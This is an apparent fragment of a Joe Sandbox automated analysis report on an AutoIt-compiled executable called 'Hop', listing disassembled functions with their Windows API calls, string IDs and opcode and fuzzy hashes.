                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B712B222E1C257C6FF209A14E00467A7661FF5176CF988239E6A9876C8CFBDE5C1DB10
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • #8.OLEAUT32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B329
                                                                                                                                                                                                                                                                                                          • #9.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B3AE
                                                                                                                                                                                                                                                                                                          • #10.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B3BA
                                                                                                                                                                                                                                                                                                          • #9.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B3C5
                                                                                                                                                                                                                                                                                                          • #2.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B3F5
                                                                                                                                                                                                                                                                                                          • #10.WSOCK32(?,?,?,?,?,?,?,00007FF68C49B677,?,?,?,?,?,?,00000000,00007FF68C4C83FD), ref: 00007FF68C49B457
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                                                                                                          • API String ID: 0-2263619337
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2592858361-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 450394209-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2082702847-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: #$E$O
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-248080428
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
Similarity
• API ID: IconLoadNotifyShell_Stringwcscpy
• String ID: Line %d: $AutoIt -
• API String ID: 3135491444-4094128768
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3659116390-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Show$Enable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2939132127-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3225163088-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2067211477-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2117695475-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 76f5a4f8964e0cc19212f048f56a346bc4fa40f5b47981df9131b5e08b2bb0af
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2017C61A18A06C2EB05CB30A89413A9361FF9979DB54023DF24FE35A5DF2DE4D5CB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4B0774
                                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4B077F
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4B078D
                                                                                                                                                                                                                                                                                                          • ~SyncLockT.VCCORLIB ref: 00007FF68C4B0796
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4AFF10: CloseHandle.KERNEL32(?,?,?,00007FF68C4B079B,?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4AFF21
                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4B07A2
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3142591903-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                                                                                                                                                                                                                                                                                                          • Instruction ID: d47d38671b9c9dfe6a2dee9974304cc45ec03a10345b9d5c52ca198448b50fad
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0401107AA08A41C6E650DB15E44022D7370FB88BA8F504039EB8E83A95DF38D496CB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2625713937-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9720c30a4924ec51527b5f5c9e76385c00257ab9f0335f2fc8f7d08be6e26667
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18015A71D08686C6FA648B20B95473567B1BF88B99F18463CD52A87A61CF7DA0E8C701
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1611280651-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 23a20e3609ab8e97003176603b087ea423037f5684bf8dc6ccfbbc412c2301bf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8901D661B08A82D2FA14AB61959463C2261FF40B7CF54573DD63E936E9DF2CA8A8C340
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                                          • Opcode ID: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 62f732b51a2770be26f7d09750142cd34963e5071d1ce37204a9e3ff12cdcf17
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A81A172E09246C6FB694F25B64837926B0FF1175CF04803EDA0AD7686DE6DE8E0E301
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C434082
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C434090
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C4340A0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C4340B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C4340BE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C4340CC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4340DC: RegisterWindowMessageW.USER32(?,?,?,00007FF68C434F68), ref: 00007FF68C434146
                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C43106D), ref: 00007FF68C435042
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C43106D), ref: 00007FF68C4350C8
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C43106D), ref: 00007FF68C47B336
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt
                                                                                                                                                                                                                                                                                                          • API String ID: 1986988660-2515660138
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 40a764a39e1d52bedcae5fc2987eed4dbef71ea1480b91c6f656cd7983a37013
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8C1CF71D1AB42C5EA40DB14B8A14B5BBE8FFE8354F54023ED48D92E61DF7CA1A1C782
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: $*
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                                                                                                          • Opcode ID: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5acb1f2bfc89b16017ea5a35541fd95ff17e241e440aa7ab7eff0088df6f9d8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1661407290C642CAE7A88E34805937C3BA0FF05B5DF14123DEA5AC7299CF29E4C9C725
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                          • String ID: !$acos
                                                                                                                                                                                                                                                                                                          • API String ID: 1156100317-2870037509
                                                                                                                                                                                                                                                                                                          • Opcode ID: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                                                                                                                                                                                                                                                                                                          • Instruction ID: 38986b133045ecb17b7f32e20283ad92f447a4e56201f9f7fd3233fe772f1071
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A614221D28F45C9E623CB3858516769754BF963D8F11833AEA5EB6A64DF2CA0C2C700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                          • String ID: !$asin
                                                                                                                                                                                                                                                                                                          • API String ID: 1156100317-2188059690
                                                                                                                                                                                                                                                                                                          • Opcode ID: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8900208f441990c246db0411d5b4b019736cfcdadbb76645db659fae02a3850e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E619921D28F85C5E653CB7858113B69754BF963D8F11833AEA5EB7A69DF2CA0C2C700
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 135850232-3110715001
                                                                                                                                                                                                                                                                                                          • Opcode ID: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3755bdab369e2f61871801733481fd94b2c03d08c3ca2db828f4eafd4b4bedd4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C41AF22B04681C6E760DF1584043AE77A1FFC4BA8F5A8239EA6D973C1DF79D485CB00
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                                                                                          • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                                                                                          • Opcode ID: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7d33c79795041bb884430b4fdd0c11aaa9ff67cd74de28e296e411d73451c9f6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41B162A18A45C2EB60CF25E4447AA77A1FF88B98F414035EE8EC7798DF7CD485C740
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7b452d79645368aaea87003b3ed4b5e784ea90c3cd510d88b6028b2f0f4fe1b6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB412A32A097D2C6E770DB24E444B9A77A1FB84768F144339DAA847B99CF3CD895CB40
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateObjectStock
                                                                                                                                                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                          • API String ID: 2671490118-1439706946
                                                                                                                                                                                                                                                                                                          • Opcode ID: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                                                                                                                                                                                                                          • Instruction ID: fd52207d990bb73c1f4e389005e5e2813571049ac73ca5edc4c7d5236d620f1b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC4160326086C1CAE770DF15E444B5AB7A1FB887A4F504239EA9943B99DF3CD485CF40
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                                                                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                          • API String ID: 1752125012-2298589950
                                                                                                                                                                                                                                                                                                          • Opcode ID: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                                                                                                                                                                                                                          • Instruction ID: f2f0f2084a4e3399b5be66c3656a7d7f2d9afb2b76da0a991c3c15b5bb5751d5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46317072A18B81C6EB20CF15E4907A973A1FBC5B95F108139DA8D83B99CF3CD485CB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                                                                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                                                                                                                                                          • API String ID: 3747482310-2633736733
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
